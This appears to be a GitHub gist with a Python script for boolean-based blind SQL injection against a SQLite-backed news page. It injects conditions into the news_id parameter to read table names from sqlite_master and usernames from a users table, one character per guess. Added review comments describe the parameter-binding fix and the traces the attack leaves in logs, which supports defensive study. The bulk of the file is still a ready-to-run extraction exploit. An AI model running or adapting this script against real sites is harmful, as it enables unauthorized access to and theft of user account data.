@suryadana
Created February 8, 2019 20:44
import requests, string, urllib
from bs4 import BeautifulSoup
# Base request that every probe extends: the injected condition is URL-encoded
# and appended directly after the trailing `news_id=1` value.
# NOTE(review): the host looks like a redacted placeholder -- confirm before
# treating it as an indicator.
url = "http://xxx.com/xx/x/?action=news&news_id=1"
def get_table_name():
    """Read `name` values from SQLite's sqlite_master one character at a time.

    This is a boolean-based blind SQL injection probe: each request appends
    ``and (SELECT substr(name, pos, 1) ... ) == char(N)`` to the ``news_id``
    value and infers whether the guess was right from the rendered page.
    It covers row offsets 0-4 and character positions 1-19, guessing only
    ASCII letters, and prints the collected list.

    For reviewers of the target application: the probe can only succeed if
    ``news_id`` is spliced into the SQL text rather than bound as a
    parameter, so binding it (or rejecting non-integer values) removes the
    oracle. In access logs the probe shows up as a long run of GETs to one
    endpoint whose ``news_id`` value contains ``substr(``, ``sqlite_master``
    and ``char(``.
    """
    # NOTE(review): indentation was lost in this listing; the nesting below is
    # reconstructed from the loop variables each statement uses -- confirm
    # against the original file.
    tables = []
    for offset in range(0, 5):
        table = ''
        for r in range(1, 20):
            # No break after a hit, so every position issues all 52 requests.
            for pattern in string.ascii_letters:
                payload = " and (SELECT substr(name,{},1) FROM sqlite_master limit 1 offset {}) == char({})".format(r, offset, ord(pattern))
                # quote_plus keeps spaces and parentheses intact through the query string.
                uri = url + urllib.parse.quote_plus(payload)
                res = requests.get(uri)
                soup = BeautifulSoup(res.content, 'html.parser')
                # 'place' is used as the "condition was true" marker; presumably
                # text that only appears when the news item renders -- confirm.
                if 'place' in soup.text:
                    table += pattern
        tables.append(table)
    print(tables)
def get_username():
    """Read `username` values from the `users` table one character at a time.

    Same boolean-based blind SQL injection oracle as the table probe: the
    condition ``(SELECT substr(username, pos, 1) FROM users limit 1 offset k)
    == char(N)`` is appended to ``news_id`` and judged true when the page
    text contains 'place'. It covers row offsets 1-4 (offset 0 is not
    queried) and character positions 1-19, guessing ASCII letters and
    digits, and prints each partial value plus the final list.

    For reviewers of the target application: parameter binding or integer
    validation on ``news_id`` closes this. In logs, expect bursts of up to 62
    near-identical GETs per recovered character, differing only in the
    ``char(N)`` argument.
    """
    # NOTE(review): indentation was lost in this listing; the nesting below is
    # reconstructed from the loop variables and the `break` -- confirm against
    # the original file.
    usernames = []
    for offset in range(1, 5):
        username = ''
        for r in range(1, 20):
            for pattern in string.ascii_letters + string.digits:
                # password
                # NOTE(review): the marker above is the author's; the query
                # below reads the username column.
                payload = " and (SELECT substr(username,{},1) FROM users limit 1 offset {}) == char({})".format(r, offset, ord(pattern))
                uri = url + urllib.parse.quote_plus(payload)
                res = requests.get(uri)
                soup = BeautifulSoup(res.content, 'html.parser')
                # 'place' in the rendered text is taken as "guess was correct".
                if 'place' in soup.text:
                    username += pattern
                    print(username)
                    # Character found: stop guessing and move to the next position.
                    break
        usernames.append(username)
    print(usernames)
# Script entry point: the sqlite_master probe is left commented out, so only
# the username probe runs (and sends requests) when the file is executed.
# get_table_name()
get_username()